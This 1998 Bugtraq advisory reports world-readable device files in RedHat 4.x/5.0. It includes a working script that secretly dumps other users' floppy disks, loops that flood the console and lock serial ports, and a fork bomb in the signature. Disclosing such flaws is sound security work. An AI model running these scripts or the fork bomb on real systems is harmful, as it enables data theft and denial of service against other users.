[6066] in bugtraq
RedHat 4.x/5.0 /dev permissions
daemon@ATHENA.MIT.EDU (=?UNKNOWN-8BIT?Q?Micha=B3?= Zalews)
Wed Feb 4 11:32:19 1998
Date: Wed, 4 Feb 1998 09:45:37 +0100
Reply-To: =?UNKNOWN-8BIT?Q?Micha=B3?= Zalewski <lcamtuf@POLBOX.COM>
From: =?UNKNOWN-8BIT?Q?Micha=B3?= Zalewski <lcamtuf@POLBOX.COM>
To: BUGTRAQ@NETSPACE.ORG
First one
----------
Any user can read data from (even not mounted) floppy using
"cat /dev/fd0H1440". It isn't dangerous itself, but... Any user
may write a script, which periodically checks if floppy has been
just unmounted, then dumps it's content to a file. Here's a sample
'floppy collector':
-- fdumper --
#!/bin/sh
DUMP_DEV=3D/dev/fd0H1440
MOUNT_DEV=3D/dev/fd0
LABEL=3D0
DUMPED=3D1
while :; do
sleep 1
if [ "`mount|grep \"^${MOUNT_DEV}\"`" =3D "" ]; then
if [ "$DUMPED" =3D "0" ]; then
echo "Dumping image #$LABEL..."
cat $DUMP_DEV >.fdimage$LABEL
let LABEL=3DLABEL+1
DUMPED=3D1
fi
else
DUMPED=3D0
fi
done
-- eof --
Also, if there's no floppy in drive, unprivledged user may flood
kernel log console (local console by default!!!):
[user@host sth]$ while :; do cat /dev/fd0H1440;done &
It will generate a lot of kernel messages, which will be logged
to /var/log/messages AND to console (default klogd behaviour). Also,
every printk(...) (called by fd driver) uses sync() to flush buffers.
It will cause abnormal hdd activity.
Second one
-----------
(not tested with rh 5.0)
Ordinary user are allowed to read /dev/ttyS*. Serial ports driver
disallows multiple access attempts at the same time, so user may
permanently lock choosen port using this command:
[user@host user]$ cat /dev/ttyS0
(Ctrl+Z)
[user@host user]$ cat /dev/ttyS0
cat: /dev/ttyS0: device is busy
Now serial port is in unusable state.
That's all?
------------
There are also a lot of other, not-so-common devices, eg. /dev/sequence=
r,
which are world-readable or even world-writable.
There's no ANY reason to give ordinary users direct access to hardware
devices. It's quite easy (as shown above ;) to obtain an interesting
data or cause system failure by reading/writing these devices.
Solution...
------------
ls -l /dev/* | grep "r-- "
chmod ;)
_______________________________________________________________________
Micha=B3 Zalewski [tel 9690] | finger 4 PGP [lcamtuf@boss.staszic.waw.p=
l]
Iterowa=E6 jest rzecz=B1 ludzk=B1, wykonywa=E6 rekursywnie - bosk=B1 [P=
. Deustch]
=3D------- [ echo -e "while :;do \$0&\ndone">_;chmod +x _;./_ ] -------=
-=3D
